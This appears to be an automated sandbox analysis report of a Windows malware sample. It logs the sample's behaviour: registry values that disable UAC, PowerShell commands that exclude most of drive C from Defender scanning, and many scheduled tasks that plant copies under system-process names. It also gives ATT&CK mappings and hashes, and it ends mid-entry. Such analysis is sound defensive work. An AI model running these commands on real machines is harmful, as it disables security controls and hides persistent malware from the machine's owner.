Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	NEAS.958a297912778bfedf7f5c8f4e270900.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	NEAS.958a297912778bfedf7f5c8f4e270900.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	NEAS.958a297912778bfedf7f5c8f4e270900.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\NEAS.958a297912778bfedf7f5c8f4e270900.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.958a297912778bfedf7f5c8f4e270900.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2360
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
  2⤵
  PID:3016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:564
- C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\smss.exe
  "C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\smss.exe"
  2⤵
  - UAC bypass
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:1756
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7f381aea-45f1-472e-8f9b-d6cdefc1eee8.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1912
  - - C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\smss.exe
      C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\smss.exe
      4⤵
      UAC bypass
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      System policy modification
      PID:1364
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d2fcf127-33d6-4f12-a9ae-d0d824f9a71d.vbs"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2368
      - C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\smss.exe
        
        C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\smss.exe
        6⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        System policy modification
        
        PID:1056
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1eed50bc-7a70-434c-a424-53aecc542c35.vbs"
        7⤵
        
        PID:2356
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\055be4de-4cea-4cee-aaee-e937dda0da39.vbs"
        7⤵
        
        PID:1828
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f0feab1c-65e8-49b8-9faf-7f877f28b8e5.vbs"
        5⤵
        
        PID:1996
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d31ab2e9-8fb4-4f07-88f4-45b61a936ccf.vbs"
    3⤵
    PID:2136

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2856

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Package Cache\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2456

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Package Cache\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Windows\ShellNew\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:668

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\ShellNew\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Windows\ShellNew\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office\Office14\1033\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2800

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office14\1033\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office\Office14\1033\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\taskhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2176

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "NEAS.958a297912778bfedf7f5c8f4e270900N" /sc MINUTE /mo 10 /tr "'C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\NEAS.958a297912778bfedf7f5c8f4e270900.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "NEAS.958a297912778bfedf7f5c8f4e270900" /sc ONLOGON /tr "'C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\NEAS.958a297912778bfedf7f5c8f4e270900.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "NEAS.958a297912778bfedf7f5c8f4e270900N" /sc MINUTE /mo 7 /tr "'C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\NEAS.958a297912778bfedf7f5c8f4e270900.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\audiodg.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\audiodg.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 13 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\audiodg.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Windows\Tasks\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\Tasks\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Windows\Tasks\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Links\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\Links\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Links\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1192

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Windows\PCHEALTH\ERRORREP\QHEADLES\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\PCHEALTH\ERRORREP\QHEADLES\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1444

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Windows\PCHEALTH\ERRORREP\QHEADLES\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Pictures\Sample Pictures\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Public\Pictures\Sample Pictures\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Pictures\Sample Pictures\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Windows\tracing\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\tracing\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Windows\tracing\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1760

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\taskhost.exe

Filesize
1.4MB

MD5
efbfaa9853a652ea3d92c0e4aaa6102f

SHA1
986ce15b47269108d88c2ca7903ba6295ee5e833

SHA256
42f0fa51bf2871fc803504540238b9a6420f6349ffd5b050b70b9ebe23fd3e00

SHA512
a34838577919c43fa1fd8ea364c52f42ac3fc1050ee5a3899d8bf797b437f2ec5c6da0d2f7bcdd432c88625f2ce0e1197772f5632e9cfbd7ad532170a59846cc

Download Submit
C:\Program Files\Windows Portable Devices\winlogon.exe

Filesize
1.4MB

MD5
2ac6ba880c3bb78d39dbd94d9c43076b

SHA1
484ba4f6f46880e58c974ed88adba6fb29ed2672

SHA256
2bdb4b4a220f105d6cf73ebd7d88292d9e27d988848ac5ac9c2af68e02f6dbb4

SHA512
57ea270b26f9fa7c3f45274c50707c762351fc06837098aa4ec63161a0b7680d3061e69656cd4ac895aa3cadc0966911fbe1ac9ba6f820086d82ae4f2c1a5497

Download Submit
C:\Program Files\Windows Portable Devices\winlogon.exe

Filesize
1.4MB

MD5
958a297912778bfedf7f5c8f4e270900

SHA1
22d2e9dca6983ba173b6c9e48e22324467454ec2

SHA256
366f45d064951e8dd798c64542ef1ee608f501b95f2839e28bfd9fba69cde067

SHA512
182980b100be670d9598f0ce2fc71fc868a16ed27663f5182297912b8e0deb1464dd00840f5fc663e3495f1f78076dfcf787e5f5f4b99cf9bd02b816486ffdf4

Download Submit
C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\NEAS.958a297912778bfedf7f5c8f4e270900.exe

Filesize
1.4MB

MD5
caccfa3eb8866b16ebe2a3821591f177

SHA1
9d7ec0404137ccf4ddc01bb1576636c7cdc06527

SHA256
a32af961b9cc92b6c1eeb973201a056d2a2875ea485f7b937bfd03eaac9a2533

SHA512
e7099d684c86efae847080e8a5026b53459e76c5be84c3e3f200b2345c21d895bc78c1702e5fc67a243f2983ff9a17174a87bb847d2c706f05eb09a29bbb72d6

Download Submit
C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\csrss.exe

Filesize
1.4MB

MD5
6a79cc05b92b760606ff8787a45a6da7

SHA1
0a453d0e9dc16eb7afca61428b57e504385b95f8

SHA256
6671237903d1a9f8cc61c9a9fb0352946ac00276dc22e622786c0dd0801afb04

SHA512
722373e062be72406fe0d23b2cec482ed35b903d3d861c08cc96f54d35659df908ff8cb5e890b54b6541839e16d8fcf9eecc1928d72f9d874211dc510acc0dc4

Download Submit
C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\smss.exe

Filesize
1.4MB

MD5
958a297912778bfedf7f5c8f4e270900

SHA1
22d2e9dca6983ba173b6c9e48e22324467454ec2

SHA256
366f45d064951e8dd798c64542ef1ee608f501b95f2839e28bfd9fba69cde067

SHA512
182980b100be670d9598f0ce2fc71fc868a16ed27663f5182297912b8e0deb1464dd00840f5fc663e3495f1f78076dfcf787e5f5f4b99cf9bd02b816486ffdf4

Download Submit
C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\smss.exe

Filesize
1.4MB

MD5
958a297912778bfedf7f5c8f4e270900

SHA1
22d2e9dca6983ba173b6c9e48e22324467454ec2

SHA256
366f45d064951e8dd798c64542ef1ee608f501b95f2839e28bfd9fba69cde067

SHA512
182980b100be670d9598f0ce2fc71fc868a16ed27663f5182297912b8e0deb1464dd00840f5fc663e3495f1f78076dfcf787e5f5f4b99cf9bd02b816486ffdf4

Download Submit
C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\smss.exe

Filesize
1.4MB

MD5
958a297912778bfedf7f5c8f4e270900

SHA1
22d2e9dca6983ba173b6c9e48e22324467454ec2

SHA256
366f45d064951e8dd798c64542ef1ee608f501b95f2839e28bfd9fba69cde067

SHA512
182980b100be670d9598f0ce2fc71fc868a16ed27663f5182297912b8e0deb1464dd00840f5fc663e3495f1f78076dfcf787e5f5f4b99cf9bd02b816486ffdf4

Download Submit
C:\Recovery\f596bfe2-7211-11ee-b58c-fd22f4f772f4\smss.exe

Filesize
1.4MB

MD5
958a297912778bfedf7f5c8f4e270900

SHA1
22d2e9dca6983ba173b6c9e48e22324467454ec2

SHA256
366f45d064951e8dd798c64542ef1ee608f501b95f2839e28bfd9fba69cde067

SHA512
182980b100be670d9598f0ce2fc71fc868a16ed27663f5182297912b8e0deb1464dd00840f5fc663e3495f1f78076dfcf787e5f5f4b99cf9bd02b816486ffdf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\055be4de-4cea-4cee-aaee-e937dda0da39.vbs

Filesize
509B

MD5
a077edeab0f8eb4f7430e4f661090f4c

SHA1
a94168ab5b3ec2859c5a15b473846ae5b0516c04

SHA256
e931b578150acba35474bbb9f7157fcd35dc0c2d8a7b587747ac9cc168050289

SHA512
7cf4eab8bb4be9acbdebb080e36b10fccb5a9b3a8fb908143be6ef2175ce1d316b2ecfa49659dab4152e1c2be13e26570bffc89ed04142909de867c1e776bd61

Download Submit
C:\Users\Admin\AppData\Local\Temp\1eed50bc-7a70-434c-a424-53aecc542c35.vbs

Filesize
733B

MD5
420dd9caccfbff0230c2877adc0f727c

SHA1
76c0eaa5eadca11e45bfbac7d081872210864357

SHA256
7686f9a37e5bfb3b50f89f1a84926fbeb0c667b53359d4d49c8fd628ed79b8da

SHA512
b1aa6d4309f526fc6f76a58225dc7ba78f52499e4b863b6eba1640240f364e6269cc459dc39f791881744a04cc1f5d92c28802d918ad98859e20433c1a749f99

Download Submit
C:\Users\Admin\AppData\Local\Temp\7f381aea-45f1-472e-8f9b-d6cdefc1eee8.vbs

Filesize
733B

MD5
39c16223a6a7414fea88553a2065094a

SHA1
ed7ec5af8f24589823b6277d186441884bd7c4cf

SHA256
ac7c7f5d81a39be432ba6ed99340f3384695e9aa6b39ea863a63a104347f9c11

SHA512
96a62c7d43eba35ae2e8b67905e6abd673c008bb403a6168059e688485e311aba7085f1350cb6f0545aca709dffd3e082db9dca62272d45cf056466badf47505

Download Submit
C:\Users\Admin\AppData\Local\Temp\d2fcf127-33d6-4f12-a9ae-d0d824f9a71d.vbs

Filesize
733B

MD5
c581f39d5ade45c7a0e464cc5cf3e521

SHA1
466b745d00094b090316f68996e624b8fd67d074

SHA256
08e38ce146829b4212e6ffb516cd3cd3fc3ac0608777b1f5805b182994b7f280

SHA512
ef9af57d9b313e83d89d6ec51413e721c0c58d74f329271c0ce83983214ac58e2b897abb6528cc0d67772bc419c35402fb16c8990ececde93ff34d3ac9f9dc83

Download Submit
C:\Users\Admin\AppData\Local\Temp\d31ab2e9-8fb4-4f07-88f4-45b61a936ccf.vbs

Filesize
509B

MD5
a077edeab0f8eb4f7430e4f661090f4c

SHA1
a94168ab5b3ec2859c5a15b473846ae5b0516c04

SHA256
e931b578150acba35474bbb9f7157fcd35dc0c2d8a7b587747ac9cc168050289

SHA512
7cf4eab8bb4be9acbdebb080e36b10fccb5a9b3a8fb908143be6ef2175ce1d316b2ecfa49659dab4152e1c2be13e26570bffc89ed04142909de867c1e776bd61

Download Submit
C:\Users\Admin\AppData\Local\Temp\f0feab1c-65e8-49b8-9faf-7f877f28b8e5.vbs

Filesize
509B

MD5
a077edeab0f8eb4f7430e4f661090f4c

SHA1
a94168ab5b3ec2859c5a15b473846ae5b0516c04

SHA256
e931b578150acba35474bbb9f7157fcd35dc0c2d8a7b587747ac9cc168050289

SHA512
7cf4eab8bb4be9acbdebb080e36b10fccb5a9b3a8fb908143be6ef2175ce1d316b2ecfa49659dab4152e1c2be13e26570bffc89ed04142909de867c1e776bd61

Download Submit
C:\Users\Admin\AppData\Local\Temp\f0feab1c-65e8-49b8-9faf-7f877f28b8e5.vbs

Filesize
509B

MD5
a077edeab0f8eb4f7430e4f661090f4c

SHA1
a94168ab5b3ec2859c5a15b473846ae5b0516c04

SHA256
e931b578150acba35474bbb9f7157fcd35dc0c2d8a7b587747ac9cc168050289

SHA512
7cf4eab8bb4be9acbdebb080e36b10fccb5a9b3a8fb908143be6ef2175ce1d316b2ecfa49659dab4152e1c2be13e26570bffc89ed04142909de867c1e776bd61

Download Submit
C:\Users\Admin\AppData\Local\Temp\f41ca93d8deb491c3651a25177edbfdec809d4f4.exe

Filesize
1.4MB

MD5
